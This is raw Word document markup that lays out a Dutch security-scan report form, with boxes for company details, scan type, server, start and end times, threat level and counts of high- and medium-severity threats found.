                        <w:t>Laa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788736" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7F65C54E" wp14:editId="34FD3DA1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>315595</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5428615</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2086610" cy="1369060"/>
                <wp:effectExtent l="0" t="0" r="21590" b="27940"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21640"/>
                    <wp:lineTo x="21561" y="21640"/>
                    <wp:lineTo x="21561" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="663" name="Rectangle 663"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2086610" cy="136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27CB" id="Rectangle 663" o:spid="_x0000_s1026" style="position:absolute;margin-left:24.85pt;margin-top:427.45pt;width:164.3pt;height:107.8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790784" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="12278307" wp14:editId="74B5AE1D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>303530</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>7030085</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5147310" cy="1028700"/>
                <wp:effectExtent l="0" t="0" r="34290" b="38100"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21867"/>
                    <wp:lineTo x="21637" y="21867"/>
                    <wp:lineTo x="21637" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="664" name="Rectangle 664"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5147310" cy="102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7AF6" id="Rectangle 664" o:spid="_x0000_s1026" style="position:absolute;margin-left:23.9pt;margin-top:553.55pt;width:405.3pt;height:81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835840" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5CB67226" wp14:editId="5A0BD21A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>436245</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>6115050</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1842770" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="36830" b="25400"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="711" name="Text Box 711"/>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B9930EB" w14:textId="31794127" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00431886">
                            <w:r>
                              <w:t>Gemidd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67226" id="Text Box 711" o:spid="_x0000_s1154" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:34.35pt;margin-top:481.5pt;width:145.1pt;height:18pt;z-index:25283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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1B9930EB" w14:textId="31794127" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00431886">
                      <w:r>
                        <w:t>Gemiddeld</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3792" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4C3A1991" wp14:editId="349D1939">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>435610</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5882005</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1842770" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="36830" b="25400"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="710" name="Text Box 710"/>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C909AA" w14:textId="0AB9AC37" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00431886">
                            <w:r>
                              <w:t>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A1991" id="Text Box 710" o:spid="_x0000_s1155" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:34.3pt;margin-top:463.15pt;width:145.1pt;height:18pt;z-index:25283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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6EC909AA" w14:textId="0AB9AC37" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00431886">
                      <w:r>
                        <w:t>Hoo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1744" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7D688C7A" wp14:editId="035ECCC9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>432435</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5535930</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1842770" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="36830" b="25400"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="709" name="Text Box 709"/>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AD51AE9" w14:textId="16299132" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00431886">
                            <w:r>
                              <w:t>Totale dreigementen gev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88C7A" id="Text Box 709" o:spid="_x0000_s1156" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:34.05pt;margin-top:435.9pt;width:145.1pt;height:18pt;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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3AD51AE9" w14:textId="16299132" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00431886">
                      <w:r>
                        <w:t>Totale dreigementen gevond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26624" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0626BC17" wp14:editId="3A59BB82">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2018030</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4397375</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="572135" cy="800100"/>
                <wp:effectExtent l="0" t="0" r="37465" b="38100"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="704" name="Text Box 704"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="572135"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07CCEB6" w14:textId="3811FF73" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00143071">
                            <w:r>
                              <w:t>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BC17" id="Text Box 704" o:spid="_x0000_s1157" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:158.9pt;margin-top:346.25pt;width:45.05pt;height:63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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="607CCEB6" w14:textId="3811FF73" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00143071">
                      <w:r>
                        <w:t>Niveau</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00E57AF6">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252823552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3633246F" wp14:editId="0F8040FA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>432435</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4740910</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1524000" cy="451485"/>
                <wp:effectExtent l="0" t="0" r="25400" b="31115"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21873"/>
                    <wp:lineTo x="21600" y="21873"/>
                    <wp:lineTo x="21600" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="702" name="Rectangle 702"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1524000" cy="4514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D7592" id="Rectangle 702" o:spid="_x0000_s1026" style="position:absolute;margin-left:34.05pt;margin-top:373.3pt;width:120pt;height:35.55pt;z-index:25282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" fillcolor="#70ad47 [3209]" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00E57AF6">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252824576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="15B04281" wp14:editId="2384B99C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>433705</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4397375</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1525270" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="24130" b="25400"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="703" name="Text Box 703"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="15252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B4D7B46" w14:textId="1690AC1C" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">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04281" id="Text Box 703" o:spid="_x0000_s1158" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:34.15pt;margin-top:346.25pt;width:120.1pt;height:18pt;z-index:25282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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6B4D7B46" w14:textId="1690AC1C" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Dreigingsniveau</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00143071">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252822528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4EC853E5" wp14:editId="01489626">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>307340</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3940810</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2032000" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="25400" b="25400"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="701" name="Text Box 701"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2032000" cy="228600"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="bg2"/>
                        </a:solid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23188F" w14:textId="60B7FF99" w:rsidR="002A05E5" w:rsidRPr="00143071" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00143071">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Scan Result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53E5" id="Text Box 701" o:spid="_x0000_s1159" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:24.2pt;margin-top:310.3pt;width:160pt;height:18pt;z-index:2528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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7E23188F" w14:textId="60B7FF99" w:rsidR="002A05E5" w:rsidRPr="00143071" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00143071">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Scan Resultaten</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B604CB">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252786688" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5A4EB460" wp14:editId="6F166466">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>304165</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4281170</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5074285" cy="1031240"/>
                <wp:effectExtent l="0" t="0" r="31115" b="35560"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21813"/>
                    <wp:lineTo x="21624" y="21813"/>
                    <wp:lineTo x="21624" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="662" name="Rectangle 662"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5074285" cy="1031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01CF" id="Rectangle 662" o:spid="_x0000_s1026" style="position:absolute;margin-left:23.95pt;margin-top:337.1pt;width:399.55pt;height:81.2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" filled="f" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B604CB">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252821504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4BB7DF94" wp14:editId="03BFA014">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>375285</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3367405</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1524000" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="25400" b="25400"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="700" name="Text Box 700"/>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F7732F0" w14:textId="40E2CF34" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00B604CB">
                            <w:r>
                              <w:t>Scan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7DF94" id="Text Box 700" o:spid="_x0000_s1160" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:29.55pt;margin-top:265.15pt;width:120pt;height:18pt;z-index:25282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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2F7732F0" w14:textId="40E2CF34" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00B604CB">
                      <w:r>
                        <w:t>Scan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9456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="409A2910" wp14:editId="2019ABDD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>375285</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3138805</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1524000" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="25400" b="25400"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="695" name="Text Box 695"/>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E9C7BB3" w14:textId="2AEAB499" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00ED70C3">
                            <w:r>
                              <w:t>Eind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A2910" id="Text Box 695" o:spid="_x0000_s1161" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:29.55pt;margin-top:247.15pt;width:120pt;height:18pt;z-index:25281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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4E9C7BB3" w14:textId="2AEAB499" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00ED70C3">
                      <w:r>
                        <w:t>Eind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4640" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4DDE4407" wp14:editId="1977EB36">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>306070</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1878330</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1718310" cy="1947545"/>
                <wp:effectExtent l="0" t="0" r="34290" b="33655"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21692"/>
                    <wp:lineTo x="21712" y="21692"/>
                    <wp:lineTo x="21712" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="661" name="Rectangle 661"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1718310" cy="1947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E60D" id="Rectangle 661" o:spid="_x0000_s1026" style="position:absolute;margin-left:24.1pt;margin-top:147.9pt;width:135.3pt;height:153.3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17408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2A263053" wp14:editId="0861D8D7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>370840</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2911475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1524000" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="25400" b="25400"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="694" name="Text Box 694"/>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643F6ED" w14:textId="77D9B8CE" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00ED70C3">
                            <w:r>
                              <w:t>Start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63053" id="Text Box 694" o:spid="_x0000_s1162" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:29.2pt;margin-top:229.25pt;width:120pt;height:18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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4643F6ED" w14:textId="77D9B8CE" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00ED70C3">
                      <w:r>
                        <w:t>Start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5360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="742CC670" wp14:editId="5703B95D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>370840</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2682875</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1524000" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="25400" b="25400"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="693" name="Text Box 693"/>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5B68F15" w14:textId="7EA976EA" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00ED70C3">
                            <w:r>
                              <w:t>Sca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CC670" id="Text Box 693" o:spid="_x0000_s1163" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:29.2pt;margin-top:211.25pt;width:120pt;height:18pt;z-index:25281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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="05B68F15" w14:textId="7EA976EA" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00ED70C3">
                      <w:r>
                        <w:t>Scan Typ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3312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="58354127" wp14:editId="4C9F535A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>370840</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2454275</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1524000" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="25400" b="25400"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="692" name="Text Box 692"/>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4F0B8B3" w14:textId="4256598F" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00ED70C3">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54127" id="Text Box 692" o:spid="_x0000_s1164" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:29.2pt;margin-top:193.25pt;width:120pt;height:18pt;z-index:25281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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="24F0B8B3" w14:textId="4256598F" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00ED70C3">
                      <w:r>
                        <w:t>Server</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9216" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2DEBC617" wp14:editId="5833E7D7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>370840</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1997710</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1524000" cy="22860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1524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D72CE7" w14:textId="3400C9A5" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Sc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BC617" id="Text Box 684" o:spid="_x0000_s1165" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:29.2pt;margin-top:157.3pt;width:120pt;height:18pt;z-index:25280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" fillcolor="#e7e6e6 [3214]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="30D72CE7" w14:textId="3400C9A5" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Scan informati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2592" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="27F9D407" wp14:editId="6B584CF3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>306070</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>623570</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1718310" cy="1145540"/>
                <wp:effectExtent l="0" t="0" r="34290" b="22860"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21552"/>
                    <wp:lineTo x="21712" y="21552"/>
                    <wp:lineTo x="21712" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="660" name="Rectangle 660"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1718310" cy="1145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93AD" id="Rectangle 660" o:spid="_x0000_s1026" style="position:absolute;margin-left:24.1pt;margin-top:49.1pt;width:135.3pt;height:90.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08192" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3857333B" wp14:editId="463EEFBA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>370840</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1425575</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1587500" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="38100" b="25400"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="675" name="Text Box 675"/>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2B3EDFF" w14:textId="161AC8E6" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00ED70C3">
                            <w:r>
                              <w:t>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7333B" id="Text Box 675" o:spid="_x0000_s1166" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:29.2pt;margin-top:112.25pt;width:125pt;height:18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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="32B3EDFF" w14:textId="161AC8E6" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00ED70C3">
                      <w:r>
                        <w:t>E-mailadres</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6144" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="59E961F4" wp14:editId="2BC5AD72">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>370840</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1196975</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1587500" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="38100" b="25400"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="674" name="Text Box 674"/>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01D06" w14:textId="5C047972" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00ED70C3">
                            <w:r>
                              <w:t>Bedrijfs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961F4" id="Text Box 674" o:spid="_x0000_s1167" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:29.2pt;margin-top:94.25pt;width:125pt;height:18pt;z-index:2528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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="57701D06" w14:textId="5C047972" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00ED70C3">
                      <w:r>
                        <w:t>Bedrijfs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4096" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3FA38CD1" wp14:editId="789A334D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>375285</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
